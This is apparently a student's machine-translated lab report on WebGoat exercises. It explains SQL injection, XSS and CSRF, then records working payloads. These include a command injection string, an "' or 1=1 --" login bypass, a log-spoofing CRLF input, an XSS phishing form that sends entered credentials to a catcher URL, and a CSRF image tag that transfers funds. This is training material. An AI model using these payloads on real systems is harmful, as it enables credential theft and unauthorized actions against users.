Exp9 complete network foundation
Basic questions answered
SQL Injection Attacks, how to defend
The so-called SQL injection, is inserted into a Web form submitted by the SQL command or enter a domain name or page request query string, and ultimately deceive server to execute malicious SQL commands.
sql injection attacks is the use refers to the use of loopholes in the design, operation Sql statement on the target server as well as other means of attack, no user input data to verify that the main reason for Sql injection attack to succeed dynamically generated Sql statement.
For example, the login process, SQL statements, usually: "select id from users where username = '" + username + "' and password = '" + password + "'", here are our username and password to get access from a web form The data. If we enter the username in the form of input box 'or 1 = 1--. At this point we sql statement to be executed becomes a select id from users where username = '' or 1 = 1-- and password = ''. Since 1 = 1 is true, the back and password = '' is commented out. So here completely skipped the sql verification.
These are the most classic case. However, in this experiment, but also to limit the input character on the page length, etc., need to modify the corresponding code.
Thus, the defense for SQL injection attacks, are:
- Close or delete unnecessary interactive submit the form page;
- The relevant code injection point of vulnerability for code and SQL injection filter keyword to standardize code security;
- Do not place the server in order to avoid being infected file backup, or backup files contain loopholes, causing the starting point.
First, the principle of XSS attack and defense
An attacker who exploited the vulnerability site (usually these vulnerabilities that a site is not well spooler to filter user input), the input can be displayed on the page, the impact on other users of the HTML code; due to the victim's browser to the target trusted server, when the page is injected malicious script on their access to the target server, this malicious script can be successfully implemented, achieve the purpose of obtaining the user cookie and can take advantage of user identity for illegal operations.
The browser itself can recognize simple XSS attack strings to prevent simple XSS attack; Fundamentally, the solution is to remove the site XSS vulnerabilities, which requires web developers to use means of escape characters such as security.
CSRF Attacks and Defense
CSRF stands for "cross-site request forgery" and XSS stands for "cross-site scripting." Looks somewhat similar, they belong to cross-site attacks - attacks do not attack the server and the user's normal access to the site. CSRF name implies, is a request forgery, impersonate the user in the normal operation of the station. We know that the vast majority of sites are cookie to identify the user identity by other means (including the use of server-side Session of the site, mostly because the Session ID is stored in a cookie inside), and then be authorized. So to forge a user's normal operation, the best way is through XSS links or other means of deception, allowing users of this machine (that is, have an identity of the browser cookie) initiated by the user does not know the request.
Strictly speaking, can not be classified as injection CSRF attacks because Approaches CSRF XSS injection is far more than this one. CSRF easy to achieve through XSS, but poorly designed website, a link can be caused by normal CSRF.
Defense process can be considered from the perspective of the following:
- Design of the Modified station API. For this type of resource is created posting operations should only accept POST requests and GET requests should only browser without changing the server-side resources.
- Use "request token." First, the server generates a random string to a strategy, as tokens (token), stored in the Session. Requesting the page and then, the token to a hidden form field type, issued together with other information. In the page receiving the request, the comparison of information received in the token Session of the token, when the only treatment was consistent with the request, otherwise return HTTP 403 reject the request or require the user to re-authenticate landing
Practice record
SQL injection attacks
Command Injection command injection attacks
Command injection vulnerability that allows unauthorized execute operating system commands. Since the command injection vulnerability exists, the application fails to properly validate and disinfection, will call shell functions use. An attacker will often execute any system commands to achieve the purpose of deceiving applications by controlling these parameters.
Principle: the submission process add malicious code to execute an instruction in normal parameters.
- Black left sidebar selection
Command Injection, right-click on the page to selectinspect Elementthe review page elements and modify the source code Find the check box form in which any list (here BackDoors.help) add back
"& netstat -an &ipconfig
Click
Viewto see the network port usage and the IP address of the command execution
Numberic SQL Injection numeric injection
Injection numeric data (eg: never really formula) to achieve the effect of the injection.
- Choose the left column
Numberic SQL Injection, open the review page elements, add in the selected city number Value valuesor 1=1
[003] - Can display weather conditions all cities
Log Spoofing log spoofing attack
Achieved by inserting a script cheat in the log file. Fool the human eye in the log file, an attacker can use this way to clear their mark in the log.
- select
Log Spoofing - Username fill in a column
5218%0d%0aLogin Succeeded for username: admin, using a carriage return (0D%) and line feed (% 0A) to appear in the log
LAB: SQL Injection SQL injection
- Select
LAB:SQL Injectionto open the review page elements, modify the source code The password box password maximum length is adjusted to 30
Optional login user (the default here, Larry Stooge), enter a password
' or 1=1 --, successfully landing
XXS attack
Phinshing with XSS Cross Site Scripting phishing attacks
Cross-site scripting attacks are injected hijack the user's browser via HTML, any configuration the user is currently viewing HTML content, you can simulate the operation of the current user. Here is a test to obtain a user name and password attack.
Open the left-hand column
Cross-Site Scripting (xss)——Phishing with XSS- Search enter the following code in the transport
<head>
<body>
<div>
<div style="float:left;height:100px;width:50%;background-color:green;"></div>
<div style="float:left;height:100px;width:50%;background-color:red;"></div>
</div>
<div style="background-color:blue;height:200px;clear:both;"></div>
</div></div>
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("attack.!!!!!! Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
</body>
</head>The code specified in the green, red, blue three div results appear, and there has been used to trick a user prompt "This feature requires account login:" under the user name and password input box.
Enter your user name and password in the login box and click the login prompt alert would like the code, showing the stolen user name and password.
CSRF CSRF attacks
turn on
Cross-Site Scripting(xxs)——Cross Site Request Forgery(CSRF)
- View inside the right page Parameters that scr and menu were 497,900
- Enter any parameter within the Title, the input Message
<img src="http://localhost:8080/WebGoat/attack?Screen=497&menu=900&transferFunds=5000" width="1" height="1" /> Once submitted, in order to generate a Title named link (news) in the Message List. Click on the message, the current page will be downloaded and displayed the news, transferred out of 5000 yuan users, so as to achieve the purpose of CSRF attacks.
